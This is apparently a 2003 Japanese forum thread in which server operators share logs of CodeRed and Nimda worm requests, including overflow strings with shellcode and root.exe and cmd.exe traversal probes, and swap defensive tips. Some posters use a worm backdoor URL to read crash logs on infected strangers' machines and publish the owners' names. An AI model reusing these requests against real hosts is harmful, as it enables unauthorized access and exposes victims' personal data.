Fri, 11 Apr 2003 22:11:01 +0900
Received: from pop
by mail8.cwidc.net
with local (Exim 3.20 #2) id 193yIz-0003BH-00 for [email protected];
Fri, 11 Apr 2003 22:10:57 +0900
Received: from [206.40.228.122] (helo=sm22.localdomain)
by mail8.cwidc.net
with esmtp (Exim 3.20 #2) id 193yIy-0003AM-00;
Fri, 11 Apr 2003 22:10:56 +0900
Received: from unknown
Date: Fri, 11 Apr 2003 07:10:19 -0600 (MDT)
Message-Id: <[email protected]>
Comments: Received: from PbD:C6?oC65]:?E6CB]@C];A|E2<6492?oC65]:?E6CB]@C];ANz
B Received: from Jx2<2oC65]24|2:2:oC65]2?]688]@C];A|46J`geb_oC65]2?]688]@C];A|7FC
F<2H2oC65]2?]688]@C];A|8@?K@FoC65]2?]688]@C];A|9\@oC65]2?]688]@C];ATx M Recei
ved: from Ma92>2oC65]2?]688]@C];A|9:0?6EoC65]2?]688]@C];A|9:<2CFoC65]2?]688]@C];
A|:K>\AoC65]2?]688]@C];A|<2EF9:D2oC65]2?]688]@C];A|<:>:oC65]2?]688]@C];ATv T Re
ceived: from Tu<F>2oC65]2?]688]@C];A|<FD2?@oC65]2?]688]@C];A|>:J2?@oC65]2?]688]
@C];A|?30>2?2oC65]2?]688]@C];A|E\6oC65]2?]688]@C];A|E2<2\<oC65]2?]688]@C];ATq
R Received: from AcE6E@C2oC65]2?]688]@C];A|A2EC:4<oC65]2EC]4@];A|92D6oC65]6>
2:=]?6];A|KIad_oC65]6>2:=]?6];A|36673@H=oC65]9@E]4@];A|3JC5oC65]9@E]4@];ATz G Re
ceived: from Rm9@?6J366oC65]9@E]4@];A|<:?492?oC65]9@E]4@];A|?282@oC65]9@E]4@]
;A|JFA@>oC65]9@E]4@];A|2=8oC65]:?E6CB]@C];A|3@>3oC65]:?E6CB]@C];AMr Z Receive
d: from Nr43c__7oC65]:?E6CB]@C];A|4J36CoC65]:?E6CB]@C];A|7F8F@oC65]:?E6CB]@C];
A|92J2EoC65]:?E6CB]@C];A|9:C@E@oC65]:?E6CB]@C];A|9@C:<:E2oC65]:?E6CB]@C];ATT
T Received: from Nz<2KF9:C@oC65]:?E6CB]@C];A|<:5oC65]:?E6CB]@C];A|<@3@=5DoC65]:
?E6CB]@C];A|>2DoC65]:?E6CB]@C];A|>2D2@oC65]:?E6CB]@C];A|>:J23:oC65]:?E6CB]@C];
ARb Y Received: from PQ?:;:oC65]:?E6CB]@C];A|?@<@oC65]:?E6CB]@C];A|D2326oC65]:
?E6CB]@C];A|D249:oC65]:?E6CB]@C];A|D6?36:oC65]:?E6CB]@C];A|D:=6?46oC65]:?E6CB]
@C];ARz M
Errors: [email protected]
From: "US Green Card Office Ltd." <[email protected]>
To: Customer <[email protected]>
Subject: Get a Green Card for USA
MIME-Version: 1.0
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Status:

うざい
219.140.150.166 - - [13/Apr/2003:16:51:23 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1045 "-" "-"
219.140.150.166 - - [13/Apr/2003:16:51:26 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1045 "-" "-"
・
・
・

前にＣｏｄｅＲｅｄに対抗するＣｏｄｅ Ｇｒｅｅｎてのが来たけど
もう来ないな。
またこないかな。

OrgName: Asia Pacific Network Information Centre
NetRange: 202.0.0.0 - 203.255.255.255
CIDR: 202.0.0.0/7


ここ、IPうじゃうじゃ持ってて最高にうざい。
二日で100個以上CodeRed来てるけど、ここが8割占めてたｗ
LAN内全感染の悪寒。

ってかIPいっぱいあるから一見いろんなとこから来てるみたいだけど、穴のあるところが
全部穴になって被害を広めてるのね。


＃Apache初心者だから、ログを取らせない方法が良くわかんねえよ。

・ウイルス扱いにする。
・指定ファイルにアクセスしようとしたのは載せない。
・実際に、0Byteの指定ファイルを作っておく。

があった。みんなどうよ？つーかどれが普通よ？

略称のほうは知ってた・・
APNICかよ。

マトモなとこだから他から経由されてるだけな気がするな・・・

>>93
それ中国あたりのブロック割り当てじゃない？
うちにも中国方面からガンガンくるよ。

>>93
ルーターで弾く。

>>96

手作業での登録ですか？
手間が馬鹿にならんので、テクニックあればいいんだけど。

>>95
JPNIC　に関連団体で乗ってるところ。ほんとに感染してるなら微妙に恥かと。

http://216.239.57.100/search?q=cache:5uDTH1GaA9oC:www.nic.ad.jp/ja/profile/link.html+Asia+Pacific+Network+Information+Centre&hl=ja&lr=lang_ja&ie=UTF-8

>>93
ネタだよね？ね？ね？

>>99
うちもきてるよ。

これが、この板の現実でしょ。悲しいけど。

CodeRedが大量に来てますね．．．
　⇒219.156.232.21
　　219.237.77.95
　　219.181.154.52
　　219.140.211.162
　　12.235.16.127

あと、ガーラって調査会社のロボット検索もウザイ
　⇒211.4.250.133

OrgName: Asia Pacific Network Information Centre
OrgID: APNIC
Address: PO Box 2131
City: Milton
StateProv: QLD
PostalCode: 4064
Country: AU

NetRange: 219.0.0.0 - 219.255.255.255
CIDR: 219.0.0.0/8
NetName: APNIC5
NetHandle: NET-219-0-0-0-1

OrgName: AT&T WorldNet Services
OrgID: ATTW
Address: 400 Interpace Parkway
City: Parsippany
StateProv: NJ
PostalCode: 07054
Country: US

NetRange: 12.0.0.0 - 12.255.255.255
CIDR: 12.0.0.0/8
NetName: ATT
NetHandle: NET-12-0-0-0-1

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 211.4.250.0
b. [ネットワーク名] I2TS-NET
f. [組織名] 株式会社イーツ
g. [Organization] I2ts Inc.,
m. [運用責任者] MK5986JP
n. [技術連絡担当者] HI1771JP
n. [技術連絡担当者] MK5986JP

>>102
ってなってるけど、がーらって会社なの？

>>105
ﾈﾀですか？(w

>>105
nslookupで逆引きすると、gala-net.co.jpという
ドメインが出てきます。何の会社かと思って
ホームページを見たら、ネット上の書き込みを
自動巡回してチェックするサービスを提供していました。

最近、フレッシュアイのロボット検索が定期的に
来るようになって、フレッシュアイにも情報が
登録されたんですが、それをガーラのロボットが
検出して、探りを入れに来ているようです。

（＾＾）

YahooBB220013168112.bbtec.net - - [18/Apr/2003:23:11:33 +0900] "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX ?????? HTTP/1.0" 400 178

220.13.168.112うざすぎ。
YBBにメールして遮断できないものだろうか…

>>109
ごめん

>>100
来ている来ていないの問題じゃなくて(ry

>>109
YBBならIP変わらないみたいだから、アクセス制限リストに
放り込んで置けば宜しいかと。まあ、それでも鬱陶しい
事に変わりは無いけど。

>>109
入り込んで止めてあげたら？（ｗ

　　 ∧＿∧
　　（　　＾＾ ）＜ ぬるぽ（＾＾）

☆^〜^★　50音順で探せて楽して得する
http://sagatoku.fc2web.com/
　　　あなたの探し物きっとみつかるよ☆^〜^★

>>113
それってCodeGreen…w

最近こんなのが来てる。

202.98.1.21 - - [27/Apr/2003:16:37:47 +0900] "GET / HTTP/1.1" 400 296 "-" "-"
202.98.1.21 - - [27/Apr/2003:16:37:48 +0900] "POST / HTTP/1.1" 413 1035 "-" "-"

当方やふーｂｂですが、
昨日Anhttpdで適当にweb鯖を立てて放置したところ
いろいろ釣れました。

なんですかコリャ？
相手もやふーｂｂのようで。。
感染したワームが、一体何をしようとしているのだかよく分からんが
xが延々と並んでいるのが、噂に聞くバッファオーバーフローってやつですか？
一日中こんなの送ってきて動作が重くなったりしないんだろか

219.144.82.204 - - [30/Apr/2003:20:23:54 +0900] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u
8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 215
219.180.88.36 - - [30/Apr/2003:20:45:59 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 211
219.180.88.36 - - [30/Apr/2003:20:46:00 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 215
219.180.88.36 - - [30/Apr/2003:20:46:00 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215
219.180.88.36 - - [30/Apr/2003:20:46:00 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215
219.180.88.36 - - [30/Apr/2003:20:46:01 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215
219.180.88.36 - - [30/Apr/2003:20:46:02 +0900] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215

って最初の219.144.82.204は中国の鯖っぽいな。
アクセスしようとしたら漢字だらけの404が返ってきた。

やふーbbの方はアホなユーザーがワームに感染していることも知らず
繋ぎっ放しにしているのかなぁ･･･

飽きるほど見たNimdaだな。

感染していることすら判断できない、バカユーザがIISを立ち上げていることに疑問を感じるが。

つーか、>119は僅か100程のレスを遡って見る事もできんのか・・・

>>122
すんマソ。良く見たら
殆んど同じような報告がいくつも書かれていた…。

初心者なので変なのが飛んできたことが嬉しくて
ついつい書いてしまったのでつた。

こう言うワームの類って、
鯖にセキュリティーホールが無ければ直接害は無いんだよね？

しかし大量に飛んでくると
ログ作成するのに負荷が掛かるってのがあるか…

ルーターでワームだけをカットするような設定は、
簡単には出来るんかなぁ

IP指定するのは当然出来るが
こうあちこちから飛んでくると切りが無い。

だから、IP弾きは自動化できないって・・・

つーか動的IPや踏み台等を完全場合わけで簡単自動処理できるのがあるなら
教えてもらいたい・・・

なんも考えないでニムダやCodeRedを飛ばしてくるIPをブラックリストに入れると
困る可能性がある。

困ったときには、どこのブラックリストの一部が困ったのかわからないので
ブラックリスト自体を消す羽目になる。

以上無理。

IPを弾くのではなく、ワームが送るヘッダーの特徴を検出して削除する
ハードウェアルータがあったら良いのにな
もちろん検出パターンはメーカーからの自動更新で。

>>118
219.180.88.36 のは日本だし、めちゃくちゃちゃねらーだな (藁

http://219.180.88.36/scripts/root.exe?/c+type+"..\..\Docume~1\AllUse~1\Documents\DrWatson\drwtsn32.log"

>>127
> Windows 2000 Version: 5.0
> 現在のビルド: 2195
> Service Pack: None
> 現在のタイプ: Uniprocessor Free
> 登録されている会社名: （・∀・）
> 登録されている所有者: （・∀・）

禿げ藁
常時接続のくせにServicePackも当てとらんとは、
もしや、ワレザーだったりしてな。

今頃Winnyでエロ画像落としてﾊｧﾊｧしてるんだろ

MSNメッセンジャーとかIE、メモ帳位しか開いてないやん。
tptp.exeが大活躍していたりはするけどw
2ちゃんねらーにしては激しくツマンナイ椰子やね。



こういうのが糞スレ立てるんだろうな。

tftp.exeの間違い(欝氏

WHOISでみるかぎりコリアみたいですねー
210.95.90.50 - - [02/May/2003:12:57:31 +0900] "GET /default.ida?XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

これはチャイナ
210.72.239.240 - - [02/May/2003:09:53:08 +0900] "GET /default.ida?XXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

とりあえず、今日だけの分でも素のIPを晒します。
211.153.19.148
211.180.229.213
211.114.27.16
211.249.78.151
211.116.251.18
上から順に新しい
全てCoderedに感染。しかも日本のIPかな？よく分からん。

って調べたら、前のとあわせて全部国はオーストラリアじゃん!!

http://www13.big.or.jp/~fubuki/chat/chat2.html
荒らしてもただ見るだけでもOK。これからどんどんロム増えるから。
これと同じヤツをいろんなヤツにコピペしてね

>>133
馬鹿は whois を使うな。

>>126
IDSを使うといいかも。個人向けにはトレンドマイクロから出ている。
NTTからFlet'sユーザー向けのOEM版も販売されている。ただ、
スループットが低いので、光ユーザーだと勿体無い。
http://www.trendmicro.com/jp/products/desktop/gatelock/evaluate/overview.htm

>>127
>>128
>>129
不味くないか？

>>127-129
通報しますた！

と、言いたい所だが不正アクセス等を
相手は全く理解していない予感…

少なくともこれらのリクエスト送ってくるヤツらは
MSのIISを立ち上げてる、と考えていいのですか？

202.125.153.14
61.187.64.194
202.39.15.237
202.131.151.20
202.194.196.67

これらはホスト名逆引きできないんですが、どういうことでしょうか。

ふと疑問。202.131.151.20はapacheっぽいのに、何故感染してるのでしょうか。

>>138
> これらはホスト名逆引きできないんですが、どういうことでしょうか。
ISPが設定していないから。(.paknet.com.pk .twnic.net .estelcom.com .edu.cn .chinanet.cn.net)
>>139
> ふと疑問。202.131.151.20はapacheっぽいのに、何故感染してるのでしょうか。
赤帽と窓のデュアルブート環境だから。

ｷｬﾘｱ

赤帽と窓のデュアルブート環境だから。

意味が分からない、apacheが立ち上がってるのに
なぜIISに感染するcode redが動いてるの？
Linuxが動いてるはずなのに。

再接続でアドレスが変わったんじゃなーの？
んで、たまたま新たに割り振られた先に赤帽＆apacheがあったとか。

>>142
Win32版＆IISだったとか（Linuxの根拠は。

>144
実際にアクセスしてみてヘッダを見てからの発言だろーな？

>>146
ルータの下でポートフォワードで複数動かしてるとか。

自問自答ですか？

ログの中にこんなの発見した
218.20.118.230 - - [09/May/2003:05:41:08 +0900] "GET http://www.21cn.net/ HTTP/1.1" 200 1529

何？

というか、不毛にIIS動かしてるバカ多すぎ。
トラフィックの無駄遣いも甚だしい。
どうせ何のサービスかわかってないような輩だろ。
NT系、デフォルトでIISなんて入ってないはずなのに
なんで動いてるんだ。取り敢えず腹が立つ。

202.196.110.208 - - [11/May/2003:00:01:29 +0900] "GET /default.ida?
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 2973 "-" "-"

http://202.196.110.208/

チョン国の中学校の鯖が感染しております。
なんてメールしたらいいかな「貴方感染。鯖PC code red」漢文わからん（T_T）

>>128のような情報を引っ張るにはどうしたらいいの？
http://IPアドレス/scripts/root.exe?/c+type+"..\..\Docume~1\AllUse~1\Documents\DrWatson\drwtsn32.log"
ってリクエストすればいいの？404なったけど。

http://bizinfo.cool.ne.jp/biz-rank/ranklink.cgi?id=mercury

＞貴方感染

もしかしたら、なんとなく程度だとしても意味が通じるかもしれない


＞鯖PC

これは絶対無理（藁

>>150
英語で送っとけ
中国のエリートならペラペラだから

そして、その中国のエリートが管理する鯖は穴だらけ。

>>148
http://www.21cn.net/
がそのＩＰアドレスにあると勘違い（？）して参照しようとしてきたリクエスト

串

>>149
漏れW2Kでサービスをいじってたら、
知らぬ間にIISが動作していたよ･･･

ANHTTPD起動しようとしたが
80番ポートが開いてないエラーが出るので調べていたら発覚した

そんな香具師が意外と多い予感

>貴方感染
我SARS否
とか、帰ってきそう(汗

>>149
>>157
そうなんですよね。
ウイルス対策も分からないやつが、標準で入らないIISを入れてしまっていることに
やり場のない怒りと、やるせなさと…

>>155
なるほど。
けどうちはttp://www.21cn.net/じゃないのになぜ200を返したんでしょうか？
cmd.exe、root.exe、favicon.ico、default.ida等には404を返しているのに。

>>159
踏み台にして失敗したものです。
気になるようだったら、
SetEnvIf HOST FQDN allowed01
deny from env=!allowed01
にしとけば、403返すかと。

>>150
＞貴方感染
チョン環境っていうより大陸向けのような気もします。
半島って標準で和文や簡体、繁体フォント入ってるのかなあ。

マジレスすると普通に
Your environment is infected with the virus
and it is troubled. Please carry out somehow.
とかのほうが（文字コードだなんだ考えずに済んで）いいと思います。

>>160
あ、そうだったんですか。
うちが荒らされたりする分にゃ自分が我慢すれば済むけど、よそ様まで巻き込むのは不本意です。
教えていただいた「SetEnvIf HOST FQDN allowed01」を勉強のために検索してみました。

「Host:ヘッダーを指定しないリクエストを拒否する方法。」として、「ワームは、DNSの逆引きでもしない限り
HostヘッダにFQDN名をセットできない、よってIPアドレス指定でアクセスしてきても、404 Object Not Foundエ
ラーが返る。」とありましたので、httpd.confに設定してみました。

しばらくこれで様子を見てみます。ありがとうございました。
今月に入ってCodeRedが1日平均27個、先月あたりからだんだん増えてきているみたいです。
ネット上で見付けた「Code Red Check」というperl scriptと「dnstran」と「analog」使ってマメにログをチェ
ックするぐらいしか出来ませんが、地道にやっていきます。

64.110.110.240
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
（略）
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXﾖ090ﾖ858ﾖbd3ﾖ801ﾖ090ﾖ858ﾖbd3ﾖ801ﾖ090ﾖ858ﾖbd3ﾖ801ﾖ090ﾖ090ﾖ190ﾖ0c3ﾖ003ﾖb00ﾖ31bﾖ3ffﾖ078ﾖ000ﾖ0=a

ウガンダｷﾀ━━━━━━(ﾟ∀ﾟ)━━━━━━━!!!!!

202.107.205.9 - - [15/May/2003:02:00:06 +0900] "\x05\x01" 501 - "-" "-"

最近多いのですが、このリクエストは何でしょうか？新手のワーム？

219.218.95.81 - - [15/May/2003:17:46:54 +0900]
"GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u90
0%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%
u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 274 "-" "-"

　 ∋8ノノハ.∩ 　
　　 川o・-・）ノ　＜先生！こんなのがありました！
http://www.hiroyuki.zansu.com/moe/hankaku07.html
http://hiroyuki.zansu.com/moe/hankaku10.html
http://www.hiroyuki.zansu.com/moe/hankaku08.html
http://hiroyuki.zansu.com/moe/hankaku09.html
http://www.hiroyuki.zansu.com/moe/hankaku06.html
http://hiroyuki.zansu.com/moe/hankaku05.html
http://www.hiroyuki.zansu.com/moe/hankaku01.html
http://hiroyuki.zansu.com/moe/hankaku02.html
http://www.hiroyuki.zansu.com/moe/hankaku03.html
http://hiroyuki.zansu.com/moe/hankaku04.html

ワーム対策にバーチャルホストはどうよ
HTTP_HOSTがない場合はダミーページの飛ばす

ログをバーチャルホスト毎に記録すれば
ワームのログは通常のログに混じらないが

━―━―━―━―━―━―━―━―━[JR山崎駅（＾＾）]━―━―━―━―━―━―━―━―━―

203.222.151.18 - - [23/May/2003:06:21:48 +0900] "GET (^^) HTTP/1.0" 404 1373

　　　 　∧＿∧
ﾋﾟｭ.ｰ　(　　＾＾ ） ＜これからも僕を応援して下さいね（＾＾）。
　　＝〔~∪￣￣〕
　　＝ ◎――◎ 　　　　　　　　　　　　　　　　　　　　　山崎渉

初心者からの素朴な疑問

例えば、
c:/www/scripts/..ﾁ/winnt/system32/cmd.exe
にワームがアクセスしてくるとしますよね。

該当するディレクトリを作って、cmd.exeって名前のファイル（例えばフロッピーにアクセスし続けるファイルとか）置いといたらどうなるんでしょ？

きのうの夕方に同一IPから5秒おきに20連発

"GET /NULL.IDA?CCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCC%u0aeb%ub890%udacf%u77ee%u0000
%u0000%u838b%u0094%u0000%u408b%u0564%u0150%u0000
%ue0ff%u9090=x&\x90\x90\x90\x90\x90\x90\x90\x90\x90
x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\xeb\t\x90\x90\x90_\
xeb\b\x90\x90\x90\xe8\xf5\xff\xff\xff\x8do\xf0 x8d}-\
x90\x90\x90\x8b\xf7f\xb8H\x063 ...
<以下略、とても長い>

>>173
それうちにも来た。
そのあとなんか意味不明な文字があってしかもログが改行されちゃう。
何なのそれ？

>>174
http://pc2.2ch.net/test/read.cgi/mysv/1044200633/170

久々にIRC繋いだら、こんなん帰ってきたのだが…
irc.nara.wide.ad.jp - - [09/Jun/2003:23:40:24 +0900] "CONNECT 192.244.23.4:6667 HTTP/1.0" 403 1272

ワームチェックかなんかでしょうか？

http://yahoobb219055208068.bbtec.net/

バッチリ幹線してるようです。
[2ch@localhost 2ch]wget --spider http://yahoobb219055208068.bbtec.net/
1 HTTP/1.1 200 OK
2 Server: Microsoft-IIS/5.0
3 Date: Fri, 13 Jun 2003 18:18:56 GMT
4 Connection: keep-alive
5 Connection: Keep-Alive
6 Content-Length: 1230
7 Content-Type: text/html
8 Set-Cookie: ASPSESSIONIDQQQQGSUC=KOPNHKABOIBNMLOKLKJJABEE; path=/
9 Cache-control: private
200 OK

どうやって警告したらいいでしょうか。

ftpとか開いてるし、アノニログインできるし(;´Д`)
厨房運営の鯖でしょうか。

Port State Service
7/tcp open echo
9/tcp open discard
13/tcp open daytime
17/tcp open qotd
19/tcp open chargen
21/tcp open ftp
25/tcp open smtp
80/tcp open http
135/tcp open loc-srv
137/tcp filtered netbios-ns
138/tcp filtered netbios-dgm
139/tcp filtered netbios-ssn
443/tcp open https
445/tcp filtered microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
6699/tcp open napster

いろいろ情報が見れて楽しいね、他にもっと見れる情報無いかな？

htp://yahoobb219055208068.bbtec.net/scripts/root.exe?/c+type+"..\..\Docume~1\AllUse~1\Documents\DrWatson\drwtsn32.log"

アプリケーション例外が発生しました:
アプリケーション: (pid=1020)
発生時間: 2003/05/01 @ 21:50:51.907
例外番号: c0000005 (アクセス違反)

*----> システム情報 <----*
コンピュータ名: VFGYARXITW27V4Y
ユーザー名: Administrator
プロセッサの数: 1
プロセッサの種類: x86 Family 6 Model 8 Stepping 6
Windows 2000 Version: 5.0
現在のビルド: 2195
Service Pack: None
現在のタイプ: Uniprocessor Free
登録されている会社名: 日本フレートライナー（株）
登録されている所有者: 山�ｱ勝行

>>179
通報しますた。

ｷﾀ━━━━━(ﾟ∀ﾟ)━━━━━!!!!
http://homepage3.nifty.com/coco-nut/

これはもう警鐘モンだぞ。
パッチも当てない危機感のないバカは鯖なんぞ立てるな。迷惑だ。

212.165.132.144 - - [14/Jun/2003:07:43:54 +0900] "GET /default.ida?XXXXXXXXX（rya

http://212.165.132.144/scripts/root.exe?/c+type+"..\..\Docume~1\AllUse~1\Documents\DrWatson\drwtsn32.log"

Application exception occurred:
App: (pid=1568)
When: 6/2/2003 @ 02:07:38.527
Exception number: c0000005 (access violation)

*----> System Information <----*
Computer Name: CISCO-ACS
User Name: Administrator
Number of Processors: 1
Processor Type: x86 Family 6 Model 8 Stepping 10
Windows 2000 Version: 5.0
Current Build: 2195
Service Pack: None
Current Type: Uniprocessor Free
Registered Organization: prestel
Registered Owner: okada

okadaって日本人か？

(´-`).｡ｏＯ(不正にアクセスして個人情報開示してるバカだよなぁ・・・)

日本の法律では認証を掛けてないところにアクセスしても罪にならなかったような

ややグレーゾーンに近いがな。
インデックスリストが丸見えになってて、顧客情報が見られたのを不正アクセスされたと逝ってるのと同じようなもんでしょ。

わたしのホームページへアクセスした人は、不正アクセスでﾀｲｰﾎしてもらいます(w

Code Green のベータ版バイナリを手に入れたので中をのぞいてみたのだが、
%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
は Code Green の物らしい。
ウイルスだった事には変わりは無いわけだが。

あ、その下の物の方が重要っぽい。失礼

かぎの開いている家に侵入して情報ファイルを持ち出したら
そいつは窃盗罪だろう。

不正アクセス防止法にはひっかからんかもしらんけど、盗んだ情報を
公開したりしてなにか損害が起きればけっこう痛いことになるかもね

保守age

超過激ライブチャット登場！！！！！

あなたの命令で若い娘たちがヌレヌレモードへ

☆★アメリカ西海岸発☆★モザイクなし☆★

あなたの言葉で・・・ヌードにさせてください
あなたの指で・・・感じさせてください
あなたの声で・・・イ・カ・セ・テ・ください
寂しがりやの留学生の若い娘がお待ちしております！

ただいま、１０分間無料で体験できるほか７日間会費無料!!

http://www.gals-cafe.com

＞＞190
喪前がageるから・・・

6月分のcodered。
01/Jun/2003 30
02/Jun/2003 37
03/Jun/2003 24
04/Jun/2003 31
05/Jun/2003 30
06/Jun/2003 24
07/Jun/2003 24
08/Jun/2003 27
09/Jun/2003 31
10/Jun/2003 38
11/Jun/2003 30
12/Jun/2003 37
13/Jun/2003 40
14/Jun/2003 20
15/Jun/2003 25
16/Jun/2003 33
17/Jun/2003 27
18/Jun/2003 22
19/Jun/2003 21
20/Jun/2003 28
21/Jun/2003 24
22/Jun/2003 22
23/Jun/2003 27
24/Jun/2003 34
25/Jun/2003 26
26/Jun/2003 32
27/Jun/2003 33
28/Jun/2003 32
29/Jun/2003 24
30/Jun/2003 16

これワーム関係？初めて見たんだけど
それともアタック？
2003/07/05,01:55:31,,"","-",GET,"/.pl","-","-",403,266,"-","-"
2003/07/05,01:55:39,,"","-",GET,"/_vti_bin/shtml.dll","-","-",404,277,"-","-"
2003/07/05,01:55:39,,"","-",GET,"/_vti_bin/shtml.exe","-","-",404,277,"-","-"
2003/07/05,01:55:40,,"","-",GET,"/_vti_inf.html","-","-",404,272,"-","-"
2003/07/05,01:55:41,,"","-",GET,"/_vti_pvt/administrators.pwd","-","-",404,286,"-","-"
2003/07/05,01:55:41,,"","-",GET,"/_vti_pvt/authors.pwd","-","-",404,279,"-","-"
2003/07/05,01:55:42,,"","-",GET,"/_vti_pvt/service.pwd","-","-",404,279,"-","-"
2003/07/05,01:55:42,,"","-",GET,"/_vti_pvt/users.pwd","-","-",404,277,"-","-"
2003/07/05,01:55:43,,"","-",GET,"/abc/showcode.asp","-","-",404,275,"-","-"
2003/07/05,01:55:43,,"","-",GET,"/carbo.dll","-","-",404,268,"-","-"
2003/07/05,01:55:44,,"","-",GET,"/cfdocs/expelval/displayopenedfile.cfm","-","-",404,296,"-","-"
2003/07/05,01:55:45,,"","-",GET,"/cfdocs/expelval/exprcalc.cfm","-","-",404,287,"-","-"
2003/07/05,01:55:45,,"","-",GET,"/cfdocs/expelval/openfile.cfm","-","-",404,287,"-","-"
2003/07/05,01:55:46,,"","-",GET,"/cfdocs/expelval/sendmail.cfm","-","-",404,287,"-","-"
2003/07/05,01:55:49,,"","-",GET,"/cgi-bin/aglimpse","-","-",403,279,"-","-"
2003/07/05,01:55:49,,"","-",GET,"/cgi-bin/AnyForm2","-","-",403,279,"-","-"
2003/07/05,01:55:50,,"","-",GET,"/cgi-bin/AT-admin.cgi","-","-",403,283,"-","-"
2003/07/05,01:55:51,,"","-",GET,"/cgi-bin/bnbform.cgi","-","-",403,282,"-","-"
2003/07/05,01:55:51,,"","-",GET,"/cgi-bin/campas","-","-",403,277,"-","-"
2003/07/05,01:55:52,,"","-",GET,"/cgi-bin/cgiwrap","-","-",403,278,"-","-"
全67行

アクセスしようとしてるファイル名から推測すると
IIS狙いのワームでないかい？

うちにはまだお見えになられてないです

>>194
> 2003/07/05,01:55:52,,"","-",GET,"/cgi-bin/cgiwrap","-","-",403,278,"-","-"

cgiwrapの設定不備狙ってる？
IIS狙いとは言い切れない予感。

例の改ざん祭りの下準備かも((((((；ﾟДﾟ))))))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ

＞196

祭りドコー？

http://news2.2ch.net/test/read.cgi/newsplus/1057237070/

　__∧＿∧_
　|（　　＾＾ ）|　＜寝るぽ（＾＾）
　|＼⌒⌒⌒＼
　＼ |⌒⌒⌒~|　　　　　　　　　山崎渉
　　 ~￣￣￣￣

孫さん家の人が衛生管理していないので、「出禁」にしています。
衛生管理出来る様になったら、タイム系サーバーを追加して
監視兵を置くかな・・・

そういえばどこかの検索エンジンのロボットはワームみたいな動きをしていくな。

最近、損さん家のｆ＠ｔ息子が猛烈アタックしてきます。
UDPの3010・3012・3013と投げてくるけど、これ何でしょ？

ロボットといえばnabotは迷惑だ

　　　 　∧＿∧　 ∧＿∧
ﾋﾟｭ.ｰ　（　 ・３・） (　　＾＾ ） ＜これからも僕たちを応援して下さいね（＾＾）。
　　＝〔~∪￣￣￣∪￣￣〕
　　＝ ◎――――――◎ 　　　　　　　　　　　　　　　　　　　　　山崎渉&ぼるじょあ

これって何かのウイルス？
今朝会社にきたら、↓と同じぺージに書き換えられてた。
http://217.127.31.195/index.htm

やられて放置してる鯖もｲﾊﾟｰｲなんですが･･･。↓
http://www.google.co.jp/search?q=Copyright+by+Seyeon+TECH+Co.%2C+Ltd.&ie=UTF-8&oe=UTF-8&hl=ja&lr=
なんやのこれ〜〜〜！

あげ

>>205
なんで書き換えられちゃうわけ？あなたの会社のサイト
ろくにパッチも当ててないDQN鯖官なのけ

>>207
